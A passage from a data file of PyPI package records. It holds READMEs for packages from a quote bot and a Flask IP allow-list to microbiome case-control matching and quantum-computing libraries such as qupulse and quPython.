improved.\"},{\"tweet_name\":\"merit_in_positives\",\"user_name\":USERNAME,\"user_tag\":USERTAG,\"user_pic\":\"\",\"tweet_text\":\"There is merit in talking about the positive aspects of terrible situations. It helps those going through the experience to see a glimpse of light at the end of the tunnel and it may help others who go through the same experience in the future.\"},{\"tweet_name\":\"write_down_ideas\",\"user_name\":USERNAME,\"user_tag\":USERTAG,\"user_pic\":\"\",\"tweet_text\":\"Write down ideas that pop up in your head in a reliable place (note-taking app, physical notebook, etc.). We often come up with the ideas or inspiration we are looking for when we least expect it, but it's easy to let them escape.\"}]# Get all the titles (tweet names) from the previous listtitles=[tweet[\"tweet_name\"]fortweetintweets]# Directory in which to save graphicsPATH=\"some_path\"# Create custom light and dark mode settings# With `None` for the profile picture size it will default to be resized to one tenth of the graphic's sizes_light={\"font_family\":\"arial.ttf\",\"font_size_text\":80,\"font_size_header\":70,\"size\":[1800,1800],\"profile_pic_size\":[None,None],\"color_scheme\":[\"#ffffff\",\"#000000\"],\"wrap_limit\":36,\"margin_bottom\":30}s_dark={\"font_family\":\"arial.ttf\",\"font_size_text\":80,\"font_size_header\":70,\"size\":[1800,1800],\"profile_pic_size\":[None,None],\"color_scheme\":[\"#000000\",\"#ffffff\"],\"wrap_limit\":36,\"margin_bottom\":30}# Create a graphic for each `tweet_info` in the listfortweetintweets:tweet_name=tweet[\"tweet_name\"]# Each tweet is stored in its own foldertweet_path=os.path.join(PATH,tweet_name)os.system(f\"mkdir{PATH}\\\\{tweet_name}\")# And each folder has light and dark mode versions of the tweett.create_tweet(tweet,s_light,save_dir=tweet_path)tweet[\"tweet_name\"]=tweet_name+\"_DM\"t.create_tweet(tweet,s_dark,save_dir=tweet_path)"} +{"package": "quotes_scraper", "pacakge-description": "UNKNOWN"} +{"package": "quotes-wrapper", "pacakge-description": "No description available on PyPI."} +{"package": "quotesx", "pacakge-description": "What is QUOTESX?QUOTESX is basically a simple package to get quotes from, it is very simple and effiecient to use, only one line of code will get you a quote!Install GetquotesxSimply install it from pypi.org(https://pypi.org/project/quotesx/), then type from quotesx import quotesxgetQuote() functionThe getQuote function is a simple function that will return a quote, this won't print the quote so you will have to save it to a variable later and then print it.getQuote()This will return a quote, it won't print it, to do that first save the quotequote = getQuote()This will save the quote in the 'quote variable', now you can do anything that you want with thatto print it, just add the print command."} +{"package": "quotexpy", "pacakge-description": "\ud83d\udcc8 QuotexPy is a library to easily interact with qxbroker.Installing\ud83d\udcc8 QuotexPy is tested on Ubuntu 18.04 and Windows 10 withPython >= 3.10, <= 3.12.pipinstallquotexpyIf you plan to code and make changes, clone and install it locally.gitclonehttps://github.com/SantiiRepair/quotexpy.git\npipinstall-e.ImportfromquotexpyimportQuotexExamplesFor examples check outsomefound in theexampledirectory.DonationsIf you feel like showing your love and/or appreciation for this project, then how about shouting us a coffee ;)AcknowledgementsThanks to@cleitonleonelfor the initial base implementation of the project \ud83d\udd25Thanks to@ricardospinozafor solving thetradeerror in the code \ud83d\ude80NoticeThis project is a clone of theoriginalproject, because the original project was discontinued, I updated it with the help ofcollaboratorsin the community so that it is accessible to everyone."} +{"package": "quotient-security-check", "pacakge-description": "Check Whitelisted IPThis is a simple security package to check whether client IP is allowed to access the flask`s backend APIs.Before every endpoint is served, it will check for the remote IP if it exists in the list of white listed IPs, it it exists, it returns the response otherwise throws abort error:HTTPErr: 403 AbortSetupfromflaskimportFlaskfromsecurity.check_ipimportIPCheck# Initialize the Flask appapp=Flask(__name__)# import IP_list from the config file or declare it hereip_list=<>ipcheck=IPCheck(app,ip_list)Nginx RoutingBy default headers of the incoming request gets updated with localhost IP when it is passed to the backend Nginx server.\nIn order to get the real IP of the client/LAN, we need to do following configurations in the nginx config:server {\n real_ip_recursive on;\n}\n\nlocation / {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-For $remote_addr;\n proxy_set_header X-Forwarded-Host $remote_addr;\n }sample incoming request header dict after naking above changes in Nginx{'wsgi.version': (1, 0), 'wsgi.url_scheme': 'http', \n'wsgi.input': '<_io.BufferedReader name=5>', 'wsgi.errors': <_io.TextIOWrapper name='' mode='w' encoding='UTF-8'>,\n'wsgi.multithread': True, \n'wsgi.multiprocess': False, 'wsgi.run_once': False, \n'werkzeug.server.shutdown': .shutdown_server at 0x7fba5d1bd598>, \n'SERVER_SOFTWARE': 'Werkzeug/0.14.1', 'REQUEST_METHOD': 'GET', 'SCRIPT_NAME': '', 'PATH_INFO': '/', 'QUERY_STRING': '', 'REMOTE_ADDR': '127.0.0.1', 'REMOTE_PORT': 39534, 'SERVER_NAME': '127.0.0.1', 'SERVER_PORT': '8002', 'SERVER_PROTOCOL': 'HTTP/1.0', \n'HTTP_HOST': '172.30.1.23', \n'HTTP_X_REAL_IP': '10.21.120.11', \n'HTTP_X_FORWARDED_FOR': '10.21.120.11', \n'HTTP_X_FORWARDED_HOST': '10.21.120.11', \n'HTTP_CONNECTION': 'close', 'HTTP_PRAGMA': 'no-cache', \n'HTTP_CACHE_CONTROL': 'no-cache', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1', \n'HTTP_USER_AGENT': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36', \nHTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', \n'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'en-GB,en-US;q=0.9,en;q=0.8', 'werkzeug.request': }"} +{"package": "quotly", "pacakge-description": "QuotlyA quoting bot for 'Discord Hack Week'.Install & UsageUsing pip:pip install quotlyTo tell quotly to use your discord-bot token type:python -m quotly --token=''To start quotly type:python -m quotly --runYour discord-bot token is stored inside an.envfile inside your working directory.\nThe quotes are stored inside a SQLite database which is also placed in the current working directory.CommandsAdd new quote:!quotly-add \"\" After adding the quote to database, the command-call is deleted from channel and the user\nreceives a dm with a confirmation that the quote was added.Get random quote:!quotly-getGet random quote from specific author:!quotly-get Planned FeaturesMention discord users in quoteCommand for getting a specific quoteWeb-interfaceLicenseMIT"} +{"package": "quotool", "pacakge-description": "usagehis_quo(code, startdate=None, enddate=None, num=180, is_index=False)\nlast_quo(code, is_index=False, exchange='sh')"} +{"package": "quovo", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-analytics", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-base", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-base-slim", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-db", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-loaders", "pacakge-description": "No description available on PyPI."} +{"package": "quovo-sync", "pacakge-description": "No description available on PyPI."} +{"package": "qupid", "pacakge-description": "Qupid(Pronounced like cupid)Qupid is a tool for generating and statistically evaluatingmultiplecase-control matchings of microbiome data.InstallationYou can install the most up-to-date version of Qupid from PyPi using the following command:pip install qupidQuickstartQupid provides a convenience function,shuffle, to easily generate multiple matches based on matching critiera.\nThis block of code will determine each viable control per case and randomly pick 10 arrangments of a single case matched to a single valid control.\nThe output is a pandas DataFrame where the rows are case names and each column represents a valid mapping of case to control.frompkg_resourcesimportresource_filenameimportpandasaspdimportqupidmetadata_fpath=resource_filename(\"qupid\",\"tests/data/asd.tsv\")metadata=pd.read_table(metadata_fpath,sep=\"\\t\",index_col=0)asd_str=\"Diagnosed by a medical professional (doctor, physician assistant)\"no_asd_str=\"I do not have this condition\"background=metadata.query(\"asd == @no_asd_str\")focus=metadata.query(\"asd == @asd_str\")matches=qupid.shuffle(focus=focus,background=background,categories=[\"sex\",\"age_years\"],tolerance_map={\"age_years\":10},iterations=100)TutorialThere are three primary steps to the Qupid workflow:Match each case to all valid controlsGenerate multiple one-to-one matchingsEvaluate the statistical differences between cases and controls for all matchingsTo match each case to all valid controls, we need to first establish matching criteria.\nQupid allows matching by both categorical metadata (exact matches) and continuous metadata (matching within provided tolerance).\nYou can match on either a single metadata column or based on multiple.In Qupid, the cases to be matched are referred to as the \"focus\" set, while the set of all possible controls is called the \"background\".\nFor this tutorial we will be used data from the American Gut Project to match cases to controls in samples from people with autism.First, we'll load in the provided example metadata and separate it into the focus (samples from people with autism) and the background (samples from people who do not have autism).Loading datafrompkg_resourcesimportresource_filenameimportpandasaspdmetadata_fpath=resource_filename(\"qupid\",\"tests/data/asd.tsv\")metadata=pd.read_table(metadata_fpath,sep=\"\\t\",index_col=0)# Designate focus samplesasd_str=\"Diagnosed by a medical professional (doctor, physician assistant)\"no_asd_str=\"I do not have this condition\"background=metadata.query(\"asd == @no_asd_str\")focus=metadata.query(\"asd == @asd_str\")Matching each case to all possible controlsNext, we want to perform case-control matching on sex and age.\nSex is a discrete factor, so Qupid will attempt to find exact matches (e.g. male to male, female to female).\nHowever, age is a continuous factor; as a result, we should provide a tolerance value (e.g. match within 10 years).\nWe use thematch_by_multiplefunction to match based on more than one metadata category.fromqupidimportmatch_by_multiplecm=match_by_multiple(focus=focus,background=background,categories=[\"sex\",\"age_years\"],tolerance_map={\"age_years\":10})This creates aCaseMatchOneToManyobject where each case is matched to each possible control.\nYou can view the underlying matches as a dictionary withcm.case_control_map.Generating mappings from each case to a single controlWhat we now want is to match each case to asinglecontrol so we can perform downstream analysis.\nHowever, we havea lotof possible controls.\nWe can easily see how many cases and possible controls we have.print(len(cm.cases),len(cm.controls))This tells us that we have 45 cases and 1785 possible controls.\nBecause of this, there are many possible sets of valid matchings of each case to a single control.\nWe can use Qupid to generate many such cases.results=cm.create_matched_pairs(iterations=100)This creates aCaseMatchCollectiondata structure that contains 100CaseMatchOneToOneinstances.\nEachCaseMatchOneToOneentry maps each case toa single controlrather than all possible controls.\nWe can verify that each entry has exactly 45 cases and 45 controls.print(len(results[0].cases),len(results[0].controls))Qupid provides a convenience method to convert aCaseMatchCollectionobject into a pandas DataFrame.\nThe DataFrame index corresponds to the cases, while each column represents a distinct set of matching controls.\nThe value in a cell represents a matching control to the row's case.results_df=results.to_dataframe()results_df.head()0 1 ... 98 99\ncase_id ...\nS10317.000026181 S10317.000033804 S10317.000069086 ... S10317.000108605 S10317.000076381\nS10317.000071491 S10317.000155409 S10317.000103912 ... S10317.000099277 S10317.000036401\nS10317.000029293 S10317.000069676 S10317.X00175749 ... S10317.000069299 S10317.000066846\nS10317.000067638 S10317.X00179103 S10317.000052409 ... S10317.000067511 S10317.000067601\nS10317.000067637 S10317.000067747 S10317.000098161 ... S10317.000017116 S10317.000067997\n\n[5 rows x 100 columns]Statistical assessment of matchingsOnce we have this list of matchings, we want to determine how statistically difference cases are from controls based on some values.\nQupid supports two types of statistical tests: univariate and multivariate.\nUnivariate data is in the form of a vector where each case and control has a single value.\nThis can be alpha diversity, log-ratios, etc.\nMultivariate data is in the form of a distance matrix where each entry is the pairwise distance between two samples, e.g. from beta diversity analysis.\nWe will generate random data for this tutorial where there exists a small difference between ASD samples and non-ASD samples.importnumpyasnprng=np.random.default_rng()asd_mean=4ctrl_mean=3.75num_cases=len(cm.cases)num_ctrls=len(cm.controls)asd_values=rng.normal(asd_mean,1,size=num_cases)ctrl_values=rng.normal(ctrl_mean,1,size=num_ctrls)asd_values=pd.Series(asd_values,index=focus.index)ctrl_values=pd.Series(ctrl_values,index=background.index)sample_values=pd.concat([asd_values,ctrl_values])We can now evaluate a t-test between case values and control values for each possible case-control matching in our collection.fromqupid.statsimportbulk_univariate_testtest_results=bulk_univariate_test(casematches=results,values=sample_values,test=\"t\")This returns a DataFrame of test results sorted by descending test statistic.method_name test_statistic_name test_statistic p-value sample_size number_of_groups\n15 t-test t 3.900874 0.000187 90 2\n61 t-test t 3.770914 0.000294 90 2\n50 t-test t 3.536803 0.000649 90 2\n32 t-test t 3.395298 0.001030 90 2\n68 t-test t 3.310822 0.001350 90 2\n.. ... ... ... ... ... ...\n13 t-test t 0.645694 0.520158 90 2\n49 t-test t 0.555063 0.580260 90 2\n92 t-test t 0.409252 0.683349 90 2\n51 t-test t 0.110707 0.912101 90 2\n34 t-test t 0.048571 0.961371 90 2\n\n[100 rows x 6 columns]From this table, we can see that iteration 15 best separates cases from controls based on our random data.\nConversely, iteration 34 showed essentially no difference between cases and controls.\nThis shows that it is important to create multiple matchings as some of them are better than others.\nWe can plot the distribution of p-values to get a sense of the overall distribution.importmatplotlib.pyplotaspltimportseabornassnssns.histplot(test_results[\"p-value\"])We see that most of the p-values are near zero which makes sense because we simulated our data with a difference between ASD and non-ASD samples.Saving and loading qupid resultsQupid allows the saving and loading of bothCaseMatchandCaseMatchCollectionobjects.CaseMatchOneToManyandCaseMatchOneToOneobjects are saved as JSON files whileCaseMatchCollectionobjects are saved as pandas DataFrames.fromqupid.casematchimportCaseMatchOneToMany,CaseMatchOneToOne,CaseMatchCollectioncm.save(\"asd_matches.one_to_many.json\")# Save all possible matchesresults.save(\"asd_matches.100.tsv\")# Save all 100 iterationsresults[15].save(\"asd_matches.best.json\")# Save best matchingCaseMatchOneToMany.load(\"asd_matches.one_to_many.json\")CaseMatchCollection.load(\"asd_matches.100.tsv\")CaseMatchOneToOne.load(\"asd_matches.best.json\")Command Line InterfaceQupid has a command line interface to create multiple matchings from cases and possible controls.\nIf providing numeric categories, the column name must be accompanied by the tolerance after a space (e.g.age_years 5for a tolerance of 5 years).\nYou can pass multiple options to--discrete-cator--numeric-catto specify multiple matching criteria.For usage detalls, usequpid shuffle --help.qupid shuffle \\\n --focus focus.tsv \\\n --background background.tsv \\\n --iterations 15 \\\n --discrete-cat sex \\\n --discrete-cat race \\\n --numeric-cat age_years 5 \\\n --numeric-cat weight_lbs 10 \\\n --output matches.tsvQIIME 2 UsageQupid provides support for the popular QIIME 2 framework of microbiome data analysis.\nWe assume in this tutorial that you are familiar with using QIIME 2 on the command line.\nIf not, we recommend you read the excellentdocumentationbefore you get started with Qupid.Runqiime qupid --helpto see all possible commands.Matching one-to-manyUseqiime qupid match-one-to-manyto match each case to all possible controls.\nNote that for numeric categories, you must pass in tolerances in the form of+-.qiime qupid match-one-to-many \\\n --m-sample-metadata-file metadata.tsv \\\n --p-case-control-column case_control \\\n --p-categories sex age_years \\\n --p-case-identifier case \\\n --p-tolerances age_years+-10 \\\n --o-case-match-one-to-many cm_one_to_many.qzaMatching one-to-oneWith a one-to-many match, you can generate multiple possible one-to-one matches usingqiime qupid match-one-to-one.qiime qupid match-one-to-one \\\n --i-case-match-one-to-many cm_one_to_many.qza \\\n --p-iterations 10 \\\n --o-case-match-collection cm_collection.qzaQupid shuffleThe previous two commands can be run sequentially usingqiime qupid shuffle.qiime qupid shuffle \\\n --m-sample-metadata-file metadata.tsv \\\n --p-case-control-column case_control \\\n --p-categories sex age_years \\\n --p-case-identifier case \\\n --p-tolerances age_years+-10 \\\n --p-iterations 10 \\\n --output-dir shuffleStatistical assessment of matchesYou can assess how different cases are from controls using both univariate data (such as alpha diversity) or multivariate data (distance matrices).\nThe result will be a histogram of p-values from either a t-test (univariate) or PERMANOVA (multivariate) comparing cases to controls.\nNote that for either command, the input data must contain values for all possible cases and controls.qiime qupid assess-matches-univariate \\\n --i-case-match-collection cm_collection.qza \\\n --m-data-file data.tsv \\\n --m-data-column faith_pd \\\n --o-visualization univariate_p_values.qzvqiime qupid assess-matches-multivariate \\\n --i-case-match-collection cm_collection.qza \\\n --i-distance-matrix uw_unifrac_distance_matrix.qza \\\n --p-permutations 999 \\\n --o-visualization multivariate_p_values.qzvHelp with QupidIf you encounter a bug in Qupid, please post a GitHub issue and we will get to it as soon as we can. We welcome any ideas or documentation updates/fixes so please submit an issue and/or a pull request if you have thoughts on making Qupid better."} +{"package": "quple", "pacakge-description": "Quple is a framework for quantum machine learning based on the GoogleCirqandTensorFlow Quantumlibraries. It contains implementation of a wide range of quantum machine learning algorithms, including:Variational Quantum Classifier (VQC)Quantum Support Vector Machine (QSVM)Quantum Convolutional Neural Network (QCNN)Quantum Generative Adversarial Network (QGAN)Quple was originally developed for applications in high energy physics (HEP) analyses. The letter \"Q\" refers to the use of quantum computational methods in this framework. The homophone to the word \"couple\" references the concept in HEP which refers to the interaction between two objects - machine learning and high energy physics in this case.Quple started as a Google Summer of Code (GSoC) project in 2020 and 2021 for theML4Sciumbrella organization. References to related projects can be found in the descriptions below.Installing the packageTo install the current release, simply dopip install qupleTutorialsFor GSoC 2020:Tutorial-01 Quantum CircuitTutorial-02 Parameterised Quantum Circuit (PQC)Tutorial-03 Interaction GraphsTutorial-04 Encoding FunctionTutorial-05 Encoding CircuitTutorial-06 Variational CircuitTutorial-07 Circuit DescriptorsTutorial-08 Variational Quantum ClassifierFor GSoC 2021:Tutorial-09 Parameterized Quantum Circuit (PQC) layerTutorial-10 Quantum Convolution 2D (QConv2D) layerTutorial-11 Quantum Generative Adversarial Network (QGAN)Advanced Tutorial-01 QGAN High Energy Physics ApplicationGSoC 2020 : QupleThe project archive can be foundhere.For documentation and report, please checkhere.GSoC 2021 : Quple - Quantum GANThe proposed projectQuple - Quantum GANserves as an extension to the 2020 GSoC project with a major focus on the implementation of Quantum Generative Adversarial Networks (QGAN).In this project, two major concepts are developed:Quantum convolution using quantum filters (QFilter)Quantum image generation and discrimination based on quantum convolutionQuantum Convolution using Quantum FiltersRelevant tutorial notebooks:Tutorial 09,Tutorial 10.Quantum convolution uses aquantum filteras the basic building block. It replaces the classical filter by a Parameterised Quantum Circuit (PQC) which scan across the local regions (the receptive field) of an image.In the classical case, an output pixel value (neuron) that are connected to a local region in the input image is computed as the dot product between the kernel weights of the classical filter and the pixel values in the local region.In the quantum case, a quantum filter transforms the pixel values in the local region into the quantum states of its data circuit via a suitable feature map, hence projecting the data into a higher dimensional quantum (Hilbert) space. The quantum states are then propagated to the model circuit of the quantum filter which undergoes a sequence parameterised gate operations and outputs the expectation value of a given measurement operator.Implementation of the above concept is done via theQConv2Dclass with API similar to thetf.keras.layers.Conv2Dclass. It borrows common concepts in traditional convolution such asfilters,kernel_size,stridesandpadding.Note that thekernel_sizeof a quantum filter does not refer to the number of trainable weights in the quantum filter but instead to the dimensions of the receptive field passed to the data circuit.Quantum Image Generation and DiscriminationRelevant tutorial notebooks:Tutorial 11The essence of a quantum version of the Generative Adversarial Network (GAN) is to replace the generator and discriminator neural networks with quantum neural networks made up of parameterized quantum circuits (PQCs).Both quantum generator and discriminator neural networks consist of two key components. The first component is a data encoding circuit (i.e. theinput layer) that maps classical input dataofvariables into a quantum stateusing a quantum feature map. The quantum state is then passed to a PQC layer (represented by the circuit ($W(\\theta)$) made up of a series of parameterized local single-qubit rotationsand two-qubit entagling operations in which the circuit parameters represent the weights of a neural network.A pure quantum neural network therefore represents the combined circuit operation.Finally a total of(repetitions) of measurements (via a measurement operatorwhich usually is the Paulioperator acting on the i-th qubit) is made on one or multiple qubits of the combined circuit to measure the expectation values.Application of GAN to HEP - Generation of Electromagnetic Calorimeter Energy DepositionRelevant tutorial notebooks:Advanced Tutorial 01.The dataset of interest is a set of 32 x 32 images that represent the energy deposition on the detector cells of an electromagnetic calorimeter (ECAL).The local geometry of the energy deposition contains information about the properties of the particles that went through the detector cells which is crucial in identifying the particles of origin.In this particular dataset, two class of particles are involved: photons (class label \"0\") and electrons (class label \"1\"). Each image correspond to a single particle of origin, either photon or electron. In total, there are 498,000 samples, equally distributed between the two classes.The goal of a quantum GAN model in this case would be to generate images that simulate the given photon/electron images.One potential application of this model would be to perform fast simulation of ECAL enery deposition which can be used as an alternative to standard Monte Carlo simulators like GEANT4. This is especially useful when the requirement on the quality of the generated samples are less stringent such as for evaluation of ECAL related systematics uncertainties.Example photon images:Example electron images:The effective size of the images is roughly 8x8, so for demonstration purpose a cropped version of the images are used:Some example training outputs using theQGANclass from Quple:GAN with quantum generator + quantum discriminator using the modified mini-max loss function:GAN with quantum generator + quantum discriminator using the Wasserstein loss function:"} +{"package": "qupulse", "pacakge-description": "qupulse: A Quantum compUting PULse parametrization and SEquencing frameworkThe qupulse project aims to produce a software toolkit facilitating experiments involving pulse driven state manipulation of physical qubits.It provides a high-level hardware-independent representation of pulses as well as means to translate this representation to hardware-specific device instructions and waveforms, execute these instructions and perform corresponding measurements.Pulses can be assembled from previously defined subpulses, allowing easy construction of high-level from low-level pulses and re-use of previous work.\nAdditionally, all pulses are parameterizable allowing users to fine-tune and adapt pulse templates to specific hardware or functionality without redefining an entire pulse sequence. To ensure meaningful parameter values, constraints can be put on parameters on a per-pulse basis.Status and stabilityThe qupulse library is used productively by the Quantum Technology Group at the 2nd Institute of Physics at the RWTH Aachen University. As such, some features - such as pulse definition - are mostly complete and tested and interfaces are expected to remain largely stable (or changes to be backward compatible). A key goal is that experiments should be repeatable with new versions of qupulse.\nHowever, it is still possible for existing portions of the code base to be redesigned if this will increase the usability long-term.The current feature list is as follows:Definition of complex (arbitrarily deep nested and looped pulses) parameterized pulses in Python (including measurement windows)Mathematical expression evaluation (based on sympy) for parameter values and parameter constraintsSerialization of pulses (to allow storing into permanent storage)Hardware model representationHigh-level pulse to hardware configuration and waveform translation routinesHardware drivers for Tabor Electronics, Tektronix and Zurich Instruments AWGs and AlazarTech DigitizersMATLAB interface to access qupulse functionalityPending changes are tracked in thechanges.dsubdirectory and published inRELEASE_NOTES.rston release using the tooltowncrier.Installationqupulse is available onPyPiand the latest release can be installed by executing:python-mpipinstallqupulse[default]which will install all required and optional dependencies except for hardware support. qupulse version numbers follow theSemantic Versioningconventions.Alternatively, the current development version of qupulse can be installed by executingpython-mpipinstall-egit+https://github.com/qutech/qupulse.git#egg=qupulse[default]which will clone the github repository to./src/qupulseand do an editable/development install.Requirements and dependenciesqupulse requires at least Python 3.8 and is tested on 3.8, 3.9 and 3.10. It relies on some external Python packages as dependencies.\nWe intentionally did not restrict versions of dependencies in the install scripts to not unnecessarily prevent usage of newer releases of dependencies that might be compatible. However, if qupulse does encounter problems with a particular dependency version please file an issue.The backend for TaborAWGs requires packages that can be foundhere. As a shortcut you can install it from the python interpreter viaqupulse.hardware.awgs.install_requirements('tabor').The data acquisition backend for AlazarTech cards needs a package that unfortunately is not open source (yet). If you need it or have questions contactsimon.humpohl@rwth-aachen.de.DocumentationYou can find documentation on how to use this library onreadthedocsandIPython notebooks with examples in this repo. You can build it locally withpython setup.py build_sphinx.Folder StructureThe repository primarily consists of the foldersqupulse(toolkit core code) andtests(toolkit core tests). Additional parts of the project reside inMATLAB(MATLAB interface) anddoc(configuration and source files to build documentation)qupulsecontains the entire Python source code of the project and is further partitioned the following packages of related modulespulseswhich contains all modules related to pulse representation.hardwarecontaining classes for hardware representation as well as hardware driversutilscontaining miscellaneous utility modules or wrapping code for external libraries_programcontains general and hardware specific representations of instantiated (parameter free) pulses. It is private because there is no stability guarantee.Contents oftestsmirror the structure ofqupulse. For everysomewhere inqupulsethere should exist aTests.pyin the corresponding subdirectory oftests."} +{"package": "qupy", "pacakge-description": "Copyright (c) 2018 Ken NakanishiPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \u201cSoftware\u201d), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.Description: UNKNOWN\nPlatform: UNKNOWN"} +{"package": "qupython", "pacakge-description": "quPythonQuantum programs directly in Python[!WARNING]This project is currently a proof-of-concept. It will be buggy and unstable.quPython compiles Python functions into quantum programs, executes the\nprograms, and returns the results asbool-like objects.What can it do?Initialize aquPython.Qubitobject just like any other object and use it\ninside a@quantumfunction.fromqupythonimportQubit,quantum@quantumdefrandom_bit():qubit=Qubit()# Allocate new qubitqubit.h()# Mutate qubitreturnqubit.measure()# Measure qubit to boolWhen you runrandom_bit, quPython compiles your function to a quantum\nprogram, executes it, and returns results.>>>random_bit()TruequPython makes writing quantum programs feel like any other Python program.Features and examplesAllocate qubits as you go, and return classical bits asbool-like objects in\nwhatever form you like.@quantumdefghz(num_bits:int):\"\"\"Create and measure a GHZ state\"\"\"qubits=[Qubit()for_inrange(num_bits)]control,targets=qubits[0],qubits[1:]control.h()fortargetintargets:target.x(conditions=[control])return[qubit.measure()forqubitinqubits]>>> ghz(8)\n[False, False, False, False, False, False, False, False]Create classes for quantum data just as you would conventional data, and\ncondition quantum gates on classical and quantum data in exactly the same way.classBellPair:def__init__(self):self.left=Qubit().h()self.right=Qubit().x(conditions=[self.left])@quantumdefteleportation_demo():message=Qubit()bell_pair=BellPair()do_x=bell_pair.left.x(conditions=[message]).measure()do_z=message.h().measure()bell_pair.right.x(conditions=[do_x]).z(conditions=[do_z])returnbell_pair.right.measure()Generate Qiskit circuitsIf you want, you can just use quPython to create Qiskit circuits with Pythonic\nsyntax (rather than the assembly-like syntax ofqc.cx(0, 1)in native\nQiskit).# Compile using quPythonteleportation_demo.compile()# Draw compiled Qiskit circuitteleportation_demo.circuit.draw()\u250c\u2500\u2500\u2500\u2510\u250c\u2500\u2510 \nq_0: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u25a0\u2500\u2500\u2524 H \u251c\u2524M\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \u250c\u2500\u2500\u2500\u2510 \u2502 \u2514\u2500\u2500\u2500\u2518\u2514\u2565\u2518\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u250c\u2500\u2510\nq_1: \u2500\u2500\u2500\u2500\u2500\u2524 X \u251c\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256b\u2500\u25240 \u251c\u25240 \u251c\u2524M\u251c\n \u250c\u2500\u2500\u2500\u2510\u2514\u2500\u252c\u2500\u2518\u250c\u2500\u2534\u2500\u2510 \u250c\u2500\u2510 \u2551 \u2502 \u2502\u2502 \u2502\u2514\u2565\u2518\nq_2: \u2524 H \u251c\u2500\u2500\u25a0\u2500\u2500\u2524 X \u251c\u2500\u2524M\u251c\u2500\u2500\u256b\u2500\u2524 \u251c\u2524 \u251c\u2500\u256b\u2500\n \u2514\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2518 \u2514\u2565\u2518 \u2551 \u2502 If_else \u2502\u2502 \u2502 \u2551 \nc_0: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256c\u2550\u2550\u2550\u256c\u2550\u2561 \u255e\u2561 If_else \u255e\u2550\u2569\u2550\n \u2551 \u2551 \u2502 \u2502\u2502 \u2502 \nc_1: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u256c\u2550\u25610 \u255e\u2561 \u255e\u2550\u2550\u2550\n \u2551 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2502 \u2502 \nc_2: \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2569\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u25610 \u255e\u2550\u2550\u2550\n \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518You can compile the function without executing it, optimize the cirucit,\nexecute it however you like, then use quPython to interpret the results.fromqiskit_aer.primitivesimportSamplerqiskit_result=Sampler().run(teleportation_demo.circuit).result()teleportation_demo.interpret_result(qiskit_result)# returns `False`How it worksFor contributors (or the curious)To see how quPython works, we'll use theQubitobject outside a@quantumfunction.Qubitobjects store a list of operations that act on them.>>>qubit=Qubit()>>>qubit.h()>>>qubit.operations[quPythonInstruction(h,[])]The only way to get a classical data type from a quantum program is theQubit.measuremethod. We give the appearance that this returns abool, but\nit actually returns aQubitPromiseobject, which saves a link to the measure\noperation that created it.>>>promise=qubit.measure()>>>promiseQubitPromise()When the user calls a@quantumfunction, quPython intercepts the output,\nfinds anyQubitPromiseobjects, then traces back theQubitsthose promises\ncame from. With this information, quPython can construct theQuantumCircuitneeded to fulfil the promises. quPython then executes the circuit and fills in\ntheQubitPromisevalues."} +{"package": "quqcs", "pacakge-description": "qucuQUantum\u6982\u8ff0qucuQuantum \u662f\u57fa\u4e8e NVIDIA cuQuantum 